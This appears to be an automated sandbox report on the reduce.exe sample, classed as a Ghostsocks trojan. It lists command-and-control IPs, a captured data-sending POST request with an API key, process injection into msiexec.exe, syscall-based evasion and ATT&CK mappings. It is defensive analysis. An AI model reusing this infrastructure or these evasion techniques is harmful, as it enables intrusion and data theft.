    Source: unknown; TCP traffic detected without corresponding DNS query: 46.8.236.61
    Source: unknown; TCP traffic detected without corresponding DNS query: 46.8.236.61
    Source: unknown; TCP traffic detected without corresponding DNS query: 46.8.236.61
    Source: unknown; TCP traffic detected without corresponding DNS query: 46.8.236.61
    Source: unknown; TCP traffic detected without corresponding DNS query: 91.212.166.91
    Source: unknown; TCP traffic detected without corresponding DNS query: 91.212.166.91
    Source: unknown; TCP traffic detected without corresponding DNS query: 91.212.166.91
    Source: unknown; TCP traffic detected without corresponding DNS query: 188.130.206.243
    Source: unknown; TCP traffic detected without corresponding DNS query: 91.212.166.91
    Source: unknown; TCP traffic detected without corresponding DNS query: 188.130.206.243
    Source: unknown; TCP traffic detected without corresponding DNS query: 188.130.206.243
    Source: unknown; TCP traffic detected without corresponding DNS query: 46.8.232.106
    Source: unknown; TCP traffic detected without corresponding DNS query: 91.212.166.91
    Source: unknown; TCP traffic detected without corresponding DNS query: 91.212.166.91
    Source: unknown; TCP traffic detected without corresponding DNS query: 188.130.206.243
    Source: unknown; TCP traffic detected without corresponding DNS query: 38.180.205.164
    Source: unknown; TCP traffic detected without corresponding DNS query: 38.180.205.164
    Source: unknown; TCP traffic detected without corresponding DNS query: 38.180.205.164
    Source: unknown; TCP traffic detected without corresponding DNS query: 46.8.236.61
    Source: unknown; TCP traffic detected without corresponding DNS query: 185.121.233.152
    Source: unknown; TCP traffic detected without corresponding DNS query: 38.180.205.164
    Source: unknown; TCP traffic detected without corresponding DNS query: 185.121.233.152
    Source: unknown; TCP traffic detected without corresponding DNS query: 185.121.233.152
    Source: unknown; TCP traffic detected without corresponding DNS query: 188.130.206.243
    Source: unknown; TCP traffic detected without corresponding DNS query: 185.121.233.152
    Source: unknown; TCP traffic detected without corresponding DNS query: 185.121.233.152
    Source: unknown; TCP traffic detected without corresponding DNS query: 38.180.205.164
    Source: unknown; TCP traffic detected without corresponding DNS query: 185.121.233.152
    Source: unknown; TCP traffic detected without corresponding DNS query: 185.121.233.152
    Source: unknown; TCP traffic detected without corresponding DNS query: 185.121.233.152
    Source: unknown; TCP traffic detected without corresponding DNS query: 185.121.233.152
    Source: unknown; TCP traffic detected without corresponding DNS query: 38.180.205.164
    Source: unknown; TCP traffic detected without corresponding DNS query: 185.121.233.152
    Source: unknown; TCP traffic detected without corresponding DNS query: 185.121.233.152
    Source: unknown; TCP traffic detected without corresponding DNS query: 185.121.233.152
    Source: unknown; HTTP traffic detected:
        POST / HTTP/1.1
        Host: 46.8.232.106
        User-Agent: Go-http-client/1.1
        Content-Length: 166
        X-Api-Key: RevesNFj
        Accept-Encoding: gzip
        Data Raw: 18 4d 1b 15 0c 15 2a 0b 4c 5c 4b 2e 36 58 01 2b 23 33 31 3c 1b 15 0d 0a 20 0a 2b 07 19 02 0f 1d 27 1e 28 13 35 3f 27 44 45 45 13 1d 01 1e 10 32 10 0a 1c 08 08 0a 06 4d 54 44 0a 22 12 23 16 09 01 32 41 43 4c 16 1b 08 1b 16 3e 07 1a 14 14 00 1c 02 4b 5d 41 2c 5e 2b 0e 14 09 1e 1b 44 45 45 01 1a 07 0a 0d 31 06 1d 1d 0f 06 09 41 55 4c 56 59 10 27 41 2d 23 2c 54 2a 37 37 44 45 45 0e 0b 5b 44 53 45 5a 0b 5e 5f 0d 04 52 0a 0a 07 5e 53 56 0e 5b 00 51 50 56 5a 5d 56 5d 5f 06 5a 59 50 5b 57 00 09 4c 1b
        Data Ascii: M*L\K.6X+#31< +'(5?'DEE2MTD"#2ACL>K]A,^+DEE1AULVY'A-#,T*77DEE[DSEZ^_R^SV[QPVZ]V]_ZYP[WL
    Source: msiexec.exe, 00000007.00000002.2956126032.000000000ED22000.00000004.00001000.00020000.00000000.sdmp; String found in binary or memory: http://188.130.206.243
    Source: msiexec.exe, 00000007.00000002.2956257148.000000000ED96000.00000004.00001000.00020000.00000000.sdmp; String found in binary or memory: http://188.130.206.24338.180.205.164:80P&
    Source: msiexec.exe, 00000007.00000002.2956126032.000000000ED22000.00000004.00001000.00020000.00000000.sdmp; String found in binary or memory: http://38.180.205.164
    Source: msiexec.exe, 00000007.00000002.2956126032.000000000ED0C000.00000004.00001000.00020000.00000000.sdmp, msiexec.exe, 00000007.00000002.2956126032.000000000ED22000.00000004.00001000.00020000.00000000.sdmp; String found in binary or memory: http://38.180.205.164http://46.8.232.106
    Source: msiexec.exe, 00000007.00000002.2956126032.000000000ED22000.00000004.00001000.00020000.00000000.sdmp; String found in binary or memory: http://46.8.232.106
    Source: msiexec.exe, 00000007.00000002.2955110668.000000000EC7C000.00000004.00001000.00020000.00000000.sdmp; String found in binary or memory: http://46.8.232.106P.
    Source: msiexec.exe, 00000007.00000002.2956126032.000000000ED22000.00000004.00001000.00020000.00000000.sdmp; String found in binary or memory: http://46.8.236.61
    Source: msiexec.exe, 00000007.00000002.2955110668.000000000EC96000.00000004.00001000.00020000.00000000.sdmp; String found in binary or memory: http://46.8.236.61P
    Source: msiexec.exe, 00000007.00000002.2956126032.000000000ED22000.00000004.00001000.00020000.00000000.sdmp; String found in binary or memory: http://91.212.166.91
    Source: reduce.exe, 00000000.00000002.1716346244.000000000666C000.00000004.00000020.00020000.00000000.sdmp, Client32.exe, 00000008.00000002.1989442077.00000000067A7000.00000004.00000020.00020000.00000000.sdmp; String found in binary or memory: http://crl.sectigo.com/SectigoPublicCodeSigningCAR36.crl0y
    Source: reduce.exe, 00000000.00000002.1716346244.000000000666C000.00000004.00000020.00020000.00000000.sdmp, Client32.exe, 00000008.00000002.1989442077.00000000067A7000.00000004.00000020.00020000.00000000.sdmp; String found in binary or memory: http://crt.sectigo.com/SectigoPublicCodeSigningCAR36.crt0#
    Source: reduce.exe, 00000000.00000002.1716346244.000000000666C000.00000004.00000020.00020000.00000000.sdmp, Client32.exe, 00000008.00000002.1989442077.00000000067A7000.00000004.00000020.00020000.00000000.sdmp; String found in binary or memory: http://ocsp.sectigo.com0
    Source: reduce.exe, 00000000.00000002.1718553599.0000000009496000.00000004.00000020.00020000.00000000.sdmp, more.com, 00000001.00000002.2006666674.0000000004852000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000007.00000002.2953875021.0000000005771000.00000004.00000800.00020000.00000000.sdmp, Client32.exe, 00000008.00000002.1991442213.000000000946E000.00000004.00000020.00020000.00000000.sdmp, more.com, 00000009.00000002.2214539573.0000000004AEB000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 0000000B.00000002.2216585430.0000000004BBE000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: http://www.info-zip.org/
    Source: reduce.exe, 00000000.00000002.1720577037.00000001010CC000.00000008.00000001.01000000.00000003.sdmp, reduce.exe, 00000000.00000002.1716346244.000000000666C000.00000004.00000020.00020000.00000000.sdmp, Client32.exe, 00000008.00000000.1958521441.00000001010CC000.00000008.00000001.01000000.0000000B.sdmp, Client32.exe, 00000008.00000002.1989442077.00000000067A7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/jbsolucoes/ucp
    Source: reduce.exeString found in binary or memory: https://home.hccnet.nl/s.j.francke/colorcatcher/index.html
    Source: reduce.exe, 00000000.00000002.1716346244.000000000666C000.00000004.00000020.00020000.00000000.sdmp, Client32.exe, 00000008.00000002.1989442077.00000000067A7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://sectigo.com/CPS0
    Source: reduce.exeString found in binary or memory: https://www.freepascal.org/
    Source: reduce.exeString found in binary or memory: https://www.lazarus-ide.org/
    Source: reduce.exeStatic PE information: invalid certificate
    Source: reduce.exe, 00000000.00000002.1720577037.00000001010CC000.00000008.00000001.01000000.00000003.sdmp | Binary or memory string: OriginalFilenameD vs reduce.exe
    Source: reduce.exe, 00000000.00000002.1716346244.000000000666C000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameD vs reduce.exe
    Source: reduce.exe, 00000000.00000002.1717772547.0000000007E16000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: OriginalFilenamentdll.dllj% vs reduce.exe
    Source: reduce.exe, 00000000.00000002.1717514430.0000000007A0C000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFilenamentdll.dllj% vs reduce.exe
    Source: classification engine | Classification label: mal100.troj.evad.winEXE@12/8@0/6
    Source: C:\Windows\SysWOW64\more.com | File created: C:\Users\user\AppData\Roaming\jion
    Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7600:120:WilError_03
    Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8068:120:WilError_03
    Source: C:\Users\user\Desktop\reduce.exe | File created: C:\Users\user\AppData\Local\Temp\16ad20e3
    Source: reduce.exe | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
    Source: C:\Windows\SysWOW64\more.com | File read: C:\Users\desktop.ini
    Source: C:\Users\user\Desktop\reduce.exe | Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
    Source: reduce.exe | String found in binary or memory: <!--StartFragment-->
    Source: Client32.exe | String found in binary or memory: <!--StartFragment-->
    Source: reduce.exe | String found in binary or memory: <!--StartFragment-->
    Source: C:\Users\user\Desktop\reduce.exe | File read: C:\Users\user\Desktop\reduce.exe
    Source: unknown | Process created: C:\Users\user\Desktop\reduce.exe "C:\Users\user\Desktop\reduce.exe"
    Source: C:\Users\user\Desktop\reduce.exe | Process created: C:\Windows\SysWOW64\more.com C:\Windows\SysWOW64\more.com
    Source: C:\Windows\SysWOW64\more.com | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    Source: C:\Windows\SysWOW64\more.com | Process created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\SysWOW64\msiexec.exe
    Source: unknown | Process created: C:\Users\user\AppData\Roaming\jion\Client32.exe "C:\Users\user\AppData\Roaming\jion\Client32.exe"
    Source: C:\Users\user\AppData\Roaming\jion\Client32.exe | Process created: C:\Windows\SysWOW64\more.com C:\Windows\SysWOW64\more.com
    Source: C:\Windows\SysWOW64\more.com | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    Source: C:\Windows\SysWOW64\more.com | Process created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\SysWOW64\msiexec.exe
    Source: C:\Users\user\Desktop\reduce.exe | Process created: C:\Windows\SysWOW64\more.com C:\Windows\SysWOW64\more.com
    Source: C:\Windows\SysWOW64\more.com | Process created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\SysWOW64\msiexec.exe
    Source: C:\Users\user\AppData\Roaming\jion\Client32.exe | Process created: C:\Windows\SysWOW64\more.com C:\Windows\SysWOW64\more.com
    Source: C:\Windows\SysWOW64\more.com | Process created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\SysWOW64\msiexec.exe
    Source: C:\Users\user\Desktop\reduce.exe | Section loaded: version.dll
    Source: C:\Users\user\Desktop\reduce.exe | Section loaded: uxtheme.dll
    Source: C:\Users\user\Desktop\reduce.exe | Section loaded: msimg32.dll
    Source: C:\Users\user\Desktop\reduce.exe | Section loaded: dwmapi.dll
    Source: C:\Users\user\Desktop\reduce.exe | Section loaded: kernel.appcore.dll
    Source: C:\Users\user\Desktop\reduce.exe | Section loaded: winhttp.dll
    Source: C:\Users\user\Desktop\reduce.exe | Section loaded: windowscodecs.dll
    Source: C:\Users\user\Desktop\reduce.exe | Section loaded: shdocvw.dll
    Source: C:\Windows\SysWOW64\more.com | Section loaded: ulib.dll
    Source: C:\Windows\SysWOW64\more.com | Section loaded: fsutilext.dll
    Source: C:\Windows\SysWOW64\more.com | Section loaded: kernel.appcore.dll
    Source: C:\Windows\SysWOW64\more.com | Section loaded: bitsproxy.dll
    Source: C:\Windows\SysWOW64\more.com | Section loaded: windows.storage.dll
    Source: C:\Windows\SysWOW64\more.com | Section loaded: wldp.dll
    Source: C:\Windows\SysWOW64\more.com | Section loaded: propsys.dll
    Source: C:\Windows\SysWOW64\more.com | Section loaded: profapi.dll
    Source: C:\Windows\SysWOW64\more.com | Section loaded: linkinfo.dll
    Source: C:\Windows\SysWOW64\more.com | Section loaded: ntshrui.dll
    Source: C:\Windows\SysWOW64\more.com | Section loaded: sspicli.dll
    Source: C:\Windows\SysWOW64\more.com | Section loaded: srvcli.dll
    Source: C:\Windows\SysWOW64\more.com | Section loaded: cscapi.dll
    Source: C:\Windows\SysWOW64\more.com | Section loaded: apphelp.dll
    Source: C:\Windows\SysWOW64\more.com | Section loaded: netutils.dll
    Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: apphelp.dll
    Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: aclayers.dll
    Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: mpr.dll
    Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: sfc.dll
    Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: sfc_os.dll
    Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: shdocvw.dll
    Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: cryptbase.dll
    Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: winmm.dll
    Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: powrprof.dll
    Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: umpdc.dll
    Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: mswsock.dll
    Source: C:\Users\user\AppData\Roaming\jion\Client32.exe | Section loaded: version.dll
    Source: C:\Users\user\AppData\Roaming\jion\Client32.exe | Section loaded: uxtheme.dll
    Source: C:\Users\user\AppData\Roaming\jion\Client32.exe | Section loaded: msimg32.dll
    Source: C:\Users\user\AppData\Roaming\jion\Client32.exe | Section loaded: dwmapi.dll
    Source: C:\Users\user\AppData\Roaming\jion\Client32.exe | Section loaded: kernel.appcore.dll
    Source: C:\Users\user\AppData\Roaming\jion\Client32.exe | Section loaded: winhttp.dll
    Source: C:\Users\user\AppData\Roaming\jion\Client32.exe | Section loaded: windowscodecs.dll
    Source: C:\Users\user\AppData\Roaming\jion\Client32.exe | Section loaded: shdocvw.dll
    Source: C:\Windows\SysWOW64\more.com | Section loaded: ulib.dll
    Source: C:\Windows\SysWOW64\more.com | Section loaded: fsutilext.dll
    Source: C:\Windows\SysWOW64\more.com | Section loaded: apphelp.dll
    Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: apphelp.dll
    Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: aclayers.dll
    Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: mpr.dll
    Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: sfc.dll
    Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: sfc_os.dll
    Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: shdocvw.dll
    Source: C:\Windows\SysWOW64\more.com | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{5CE34C0D-0DC9-4C1F-897C-DAA1B78CEE7C}\InProcServer32
    Source: ivmfgila.1.dr | LNK file: ..\..\Roaming\jion\Client32.exe
    Source: Window Recorder | Window detected: More than 3 window changes detected
    Source: reduce.exe | Static PE information: Virtual size of .text is bigger than: 0x100000
    Source: reduce.exe | Static PE information: Image base 0x100000000 > 0x60000000
    Source: reduce.exe | Static file information: File size 18233144 > 1048576
    Source: reduce.exe | Static PE information: Raw size of .text is bigger than: 0x100000 < 0x5e4a00
    Source: reduce.exe | Static PE information: Raw size of .rdata is bigger than: 0x100000 < 0x2e8400
    Source: reduce.exe | Static PE information: Raw size of .rsrc is bigger than: 0x100000 < 0x7b4200
    Source: Binary string: ntdll.pdb source: reduce.exe, 00000000.00000002.1717960380.0000000008094000.00000004.00000001.00020000.00000000.sdmp, reduce.exe, 00000000.00000002.1717772547.0000000007C90000.00000004.00000800.00020000.00000000.sdmp, reduce.exe, 00000000.00000002.1717514430.0000000007894000.00000004.00000020.00020000.00000000.sdmp, Client32.exe, 00000008.00000002.1990504856.0000000007863000.00000004.00000020.00020000.00000000.sdmp, Client32.exe, 00000008.00000002.1990846904.000000000816B000.00000004.00000001.00020000.00000000.sdmp, Client32.exe, 00000008.00000002.1990644776.0000000007C60000.00000004.00000800.00020000.00000000.sdmp
    Source: Binary string: wntdll.pdbUGP source: more.com, 00000001.00000002.2006505480.00000000044F3000.00000004.00000020.00020000.00000000.sdmp, more.com, 00000001.00000002.2007201023.0000000005040000.00000004.00001000.00020000.00000000.sdmp, msiexec.exe, 00000007.00000002.2954644321.0000000005F60000.00000004.00001000.00020000.00000000.sdmp, msiexec.exe, 00000007.00000002.2953692888.000000000541E000.00000004.00000020.00020000.00000000.sdmp, more.com, 00000009.00000002.2214422504.0000000004782000.00000004.00000020.00020000.00000000.sdmp, more.com, 00000009.00000002.2214963020.00000000052E0000.00000004.00001000.00020000.00000000.sdmp, msiexec.exe, 0000000B.00000002.2216464873.0000000004851000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000B.00000002.2217032269.00000000053B0000.00000004.00001000.00020000.00000000.sdmp
    Source: Binary string: ntdll.pdbUGP source: reduce.exe, 00000000.00000002.1717960380.0000000008094000.00000004.00000001.00020000.00000000.sdmp, reduce.exe, 00000000.00000002.1717772547.0000000007C90000.00000004.00000800.00020000.00000000.sdmp, reduce.exe, 00000000.00000002.1717514430.0000000007894000.00000004.00000020.00020000.00000000.sdmp, Client32.exe, 00000008.00000002.1990504856.0000000007863000.00000004.00000020.00020000.00000000.sdmp, Client32.exe, 00000008.00000002.1990846904.000000000816B000.00000004.00000001.00020000.00000000.sdmp, Client32.exe, 00000008.00000002.1990644776.0000000007C60000.00000004.00000800.00020000.00000000.sdmp
    Source: Binary string: wntdll.pdb source: more.com, 00000001.00000002.2006505480.00000000044F3000.00000004.00000020.00020000.00000000.sdmp, more.com, 00000001.00000002.2007201023.0000000005040000.00000004.00001000.00020000.00000000.sdmp, msiexec.exe, 00000007.00000002.2954644321.0000000005F60000.00000004.00001000.00020000.00000000.sdmp, msiexec.exe, 00000007.00000002.2953692888.000000000541E000.00000004.00000020.00020000.00000000.sdmp, more.com, 00000009.00000002.2214422504.0000000004782000.00000004.00000020.00020000.00000000.sdmp, more.com, 00000009.00000002.2214963020.00000000052E0000.00000004.00001000.00020000.00000000.sdmp, msiexec.exe, 0000000B.00000002.2216464873.0000000004851000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000B.00000002.2217032269.00000000053B0000.00000004.00001000.00020000.00000000.sdmp
    Source: kupcq.1.dr | Static PE information: section name: .symtab
    Source: kupcq.1.dr | Static PE information: section name: fwjua
    Source: nfabo.9.dr | Static PE information: section name: .symtab
    Source: nfabo.9.dr | Static PE information: section name: fwjua
    Source: C:\Windows\SysWOW64\more.com | File created: C:\Users\user\AppData\Local\Temp\nfabo
    Source: C:\Windows\SysWOW64\more.com | File created: C:\Users\user\AppData\Local\Temp\kupcq
    Source: C:\Windows\SysWOW64\more.com | File created: C:\Users\user\AppData\Local\Temp\kupcq
    Source: C:\Windows\SysWOW64\more.com | File created: C:\Users\user\AppData\Local\Temp\nfabo

    Hooking and other Techniques for Hiding and Protection

    Source: C:\Windows\SysWOW64\more.com | Module Loaded: C:\USERS\user\APPDATA\LOCAL\TEMP\KUPCQ
    Source: C:\Windows\SysWOW64\more.com | Module Loaded: C:\USERS\user\APPDATA\LOCAL\TEMP\NFABO
    Source: C:\Windows\SysWOW64\msiexec.exe | Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX

    Malware Analysis System Evasion

    Source: C:\Windows\SysWOW64\more.com | API/Special instruction interceptor: Address: 75DA3B54
    Source: C:\Windows\SysWOW64\msiexec.exe | API/Special instruction interceptor: Address: 9BBC87
    Source: C:\Windows\SysWOW64\more.com | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nfabo
    Source: C:\Windows\SysWOW64\more.com | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\kupcq
    Source: C:\Users\user\Desktop\reduce.exe | API coverage: 0.0 %
    Source: C:\Users\user\AppData\Roaming\jion\Client32.exe | API coverage: 0.0 %
    Source: msiexec.exe, 00000007.00000002.2953627209.0000000003A7A000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
    Source: C:\Users\user\Desktop\reduce.exe | Process information queried: ProcessInformation

    HIPS / PFW / Operating System Protection Evasion

    Source: C:\Users\user\Desktop\reduce.exe | NtProtectVirtualMemory: Direct from: 0x9502151
    Source: C:\Users\user\AppData\Roaming\jion\Client32.exe | NtProtectVirtualMemory: Direct from: 0x4D90150
    Source: C:\Users\user\AppData\Roaming\jion\Client32.exe | NtProtectVirtualMemory: Direct from: 0xB28786873
    Source: C:\Users\user\AppData\Roaming\jion\Client32.exe | NtProtectVirtualMemory: Direct from: 0x18710
    Source: C:\Users\user\AppData\Roaming\jion\Client32.exe | NtAllocateVirtualMemory: Direct from: 0x4D90050
    Source: C:\Users\user\AppData\Roaming\jion\Client32.exe | NtClose: Direct from: 0xB20000B2
    Source: C:\Users\user\AppData\Roaming\jion\Client32.exe | NtAllocateVirtualMemory: Direct from: 0x7FFE217260D4
    Source: C:\Users\user\AppData\Roaming\jion\Client32.exe | NtProtectVirtualMemory: Direct from: 0x8062EC0
    Source: C:\Users\user\Desktop\reduce.exe | NtCreateFile: Direct from: 0x270
    Source: C:\Users\user\AppData\Roaming\jion\Client32.exe | NtClose: Direct from: 0x150
    Source: C:\Users\user\AppData\Roaming\jion\Client32.exe | NtQuerySystemInformation: Direct from: 0x7FFE21726118
    Source: C:\Users\user\Desktop\reduce.exe | NtReadFile: Direct from: 0x254
    Source: C:\Users\user\Desktop\reduce.exe | NtProtectVirtualMemory: Direct from: 0x6880150
    Source: C:\Users\user\AppData\Roaming\jion\Client32.exe | NtReadFile: Direct from: 0x218
    Source: C:\Users\user\Desktop\reduce.exe | NtAllocateVirtualMemory: Direct from: 0x6880050
    Source: C:\Users\user\AppData\Roaming\jion\Client32.exe | NtClose: Direct from: 0x7FFE2172CDF8
    Source: C:\Users\user\AppData\Roaming\jion\Client32.exe | NtCreateFile: Direct from: 0x27C
    Source: C:\Users\user\Desktop\reduce.exe | NtProtectVirtualMemory: Direct from: 0x7F92EC0
    Source: C:\Users\user\AppData\Roaming\jion\Client32.exe | NtProtectVirtualMemory: Direct from: 0x94DA151
    Source: C:\Users\user\AppData\Roaming\jion\Client32.exe | NtReadFile: Direct from: 0x1EF590
    Source: C:\Users\user\AppData\Roaming\jion\Client32.exe | NtAllocateVirtualMemory: Direct from: 0x7FFE21738E14
    Source: C:\Users\user\Desktop\reduce.exe | NtProtectVirtualMemory: Direct from: 0xB184566DB
    Source: C:\Users\user\AppData\Roaming\jion\Client32.exe | NtCreateFile: Direct from: 0x80
    Source: C:\Users\user\AppData\Roaming\jion\Client32.exe | NtDelayExecution: Direct from: 0x13FE280
    Source: C:\Users\user\AppData\Roaming\jion\Client32.exe | NtAllocateVirtualMemory: Direct from: 0x40
    Source: C:\Users\user\Desktop\reduce.exe | Section loaded: NULL target: C:\Windows\SysWOW64\more.com protection: read write
    Source: C:\Users\user\AppData\Roaming\jion\Client32.exe | Section loaded: NULL target: C:\Windows\SysWOW64\more.com protection: read write
    Source: C:\Windows\SysWOW64\more.com | Memory written: C:\Windows\SysWOW64\msiexec.exe base: 9B9330
    Source: C:\Windows\SysWOW64\more.com | Memory written: C:\Windows\SysWOW64\msiexec.exe base: 2F8F008
    Source: C:\Windows\SysWOW64\more.com | Memory written: C:\Windows\SysWOW64\msiexec.exe base: 9B9330
    Source: C:\Windows\SysWOW64\more.com | Memory written: C:\Windows\SysWOW64\msiexec.exe base: 545008
    Source: C:\Users\user\Desktop\reduce.exe | Process created: C:\Windows\SysWOW64\more.com C:\Windows\SysWOW64\more.com
    Source: C:\Windows\SysWOW64\more.com | Process created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\SysWOW64\msiexec.exe
    Source: C:\Users\user\AppData\Roaming\jion\Client32.exe | Process created: C:\Windows\SysWOW64\more.com C:\Windows\SysWOW64\more.com
    Source: C:\Windows\SysWOW64\more.com | Process created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\SysWOW64\msiexec.exe
    Source: reduce.exe | Binary or memory string: Shell_TrayWnd
    Source: reduce.exe | Binary or memory string: ToolbarWindow32Shell_TrayWnd
    Source: C:\Users\user\Desktop\reduce.exe | Queries volume information: C:\Users\user\AppData\Local\Temp\16ad20e3 VolumeInformation
    Source: C:\Windows\SysWOW64\more.com | Queries volume information: C:\ VolumeInformation
    Source: C:\Windows\SysWOW64\msiexec.exe | Queries volume information: C:\Users\user\AppData\Local\config VolumeInformation
    Source: C:\Users\user\AppData\Roaming\jion\Client32.exe | Queries volume information: C:\Users\user\AppData\Local\Temp\27142db2 VolumeInformation

    Stealing of Sensitive Information

    Source: Yara match | File source: Process Memory Space: msiexec.exe PID: 8024, type: MEMORYSTR

    Remote Access Functionality

    Source: Yara match | File source: Process Memory Space: msiexec.exe PID: 8024, type: MEMORYSTR
    MITRE ATT&CK matrix, tactic: techniques (numbers as shown in the report)

    Reconnaissance: Gather Victim Identity Information; Credentials; Email Addresses; Employee Names
    Resource Development: Acquire Infrastructure; Domains; DNS Server; Virtual Private Server
    Initial Access: Valid Accounts; Default Accounts; Domain Accounts; Local Accounts
    Execution: Command and Scripting Interpreter (2); Scheduled Task/Job; At; Cron
    Persistence: DLL Side-Loading (11); Boot or Logon Initialization Scripts; Logon Script (Windows); Login Hook
    Privilege Escalation: Process Injection (212); Abuse Elevation Control Mechanism (1); DLL Side-Loading (11); Login Hook
    Defense Evasion: Masquerading (11); Process Injection (212); Abuse Elevation Control Mechanism (1); DLL Side-Loading (11)
    Credential Access: OS Credential Dumping; LSASS Memory; Security Account Manager; NTDS
    Discovery: Security Software Discovery (21); Process Discovery (2); File and Directory Discovery (1); System Information Discovery (111)
    Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model
    Collection: Data from Local System; Data from Removable Media; Data from Network Shared Drive; Input Capture
    Command and Control: Non-Standard Port (1); Non-Application Layer Protocol (1); Application Layer Protocol (1); Proxy (1)
    Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Traffic Duplication
    Impact: Abuse Accessibility Features; Network Denial of Service; Data Encrypted for Impact; Data Destruction
    Behavior Graph ID: 1568776; Sample: reduce.exe; Start date: 04/12/2024; Architecture: WINDOWS; Score: 100
    Top-level signatures: Suricata IDS alerts for network traffic; Antivirus detection for dropped file; Multi AV Scanner detection for dropped file; 3 other signatures
    reduce.exe: started more.com; signatures: Maps a DLL or memory area into another process; Found direct / indirect Syscall (likely to bypass EDR)
    Client32.exe: started more.com
    more.com (from reduce.exe): dropped C:\Users\user\AppData\Local\Temp\kupcq (PE32); started msiexec.exe and conhost.exe; signatures: Found Tor onion address; Writes to foreign memory regions; Found hidden mapped module (file has been removed from disk); Switches to a custom stack to bypass stack traces
    more.com (from Client32.exe): dropped C:\Users\user\AppData\Local\Temp\nfabo (PE32); started msiexec.exe and conhost.exe
    msiexec.exe (from the reduce.exe chain): contacted 185.121.233.152, 28250, 49763 (IPCORE-ASES, Spain); 188.130.206.243, 49744, 80 (SVINT-ASNES, Russian Federation); 4 other IPs or domains; signatures: Found Tor onion address; Switches to a custom stack to bypass stack traces

    Source | Detection | Scanner | Label | Link
    reduce.exe | 0% | ReversingLabs | |

    Source | Detection | Scanner | Label | Link
    C:\Users\user\AppData\Local\Temp\kupcq | 100% | Avira | TR/Crypt.XPACK.Gen |
    C:\Users\user\AppData\Local\Temp\nfabo | 100% | Avira | TR/Crypt.XPACK.Gen |
    C:\Users\user\AppData\Local\Temp\kupcq | 47% | ReversingLabs | Win32.Trojan.Ghostsocks |
    C:\Users\user\AppData\Local\Temp\nfabo | 47% | ReversingLabs | Win32.Trojan.Ghostsocks |

    No Antivirus matches

    No Antivirus matches

    Source | Detection | Scanner | Label | Link
    https://www.freepascal.org/ | 0% | Avira URL Cloud | safe |
    http://188.130.206.243 | 0% | Avira URL Cloud | safe |
    http://38.180.205.164http://46.8.232.106 | 0% | Avira URL Cloud | safe |
    https://home.hccnet.nl/s.j.francke/colorcatcher/index.html | 0% | Avira URL Cloud | safe |
    http://38.180.205.164/ | 0% | Avira URL Cloud | safe |
    https://www.lazarus-ide.org/ | 0% | Avira URL Cloud | safe |
    http://38.180.205.164 | 0% | Avira URL Cloud | safe |
    http://46.8.232.106P. | 0% | Avira URL Cloud | safe |
    http://ocsp.sectigo.com0 | 0% | Avira URL Cloud | safe |
    http://188.130.206.24338.180.205.164:80P& | 0% | Avira URL Cloud | safe |
    http://46.8.236.61P | 0% | Avira URL Cloud | safe |
    http://188.130.206.243/ | 0% | Avira URL Cloud | safe |
    No contacted domains info

    Name | Malicious | Antivirus Detection | Reputation
    http://46.8.232.106/ | false | | high
    http://38.180.205.164/ | false | Avira URL Cloud: safe | unknown
    http://46.8.236.61/ | false | | high
    http://188.130.206.243/ | false | Avira URL Cloud: safe | unknown
    http://91.212.166.91/ | false | | high

    Name | Source | Malicious | Antivirus Detection | Reputation
    https://www.freepascal.org/ | reduce.exe | false | Avira URL Cloud: safe | unknown
    https://sectigo.com/CPS0 | reduce.exe, 00000000.00000002.1716346244.000000000666C000.00000004.00000020.00020000.00000000.sdmp, Client32.exe, 00000008.00000002.1989442077.00000000067A7000.00000004.00000020.00020000.00000000.sdmp | false | | high
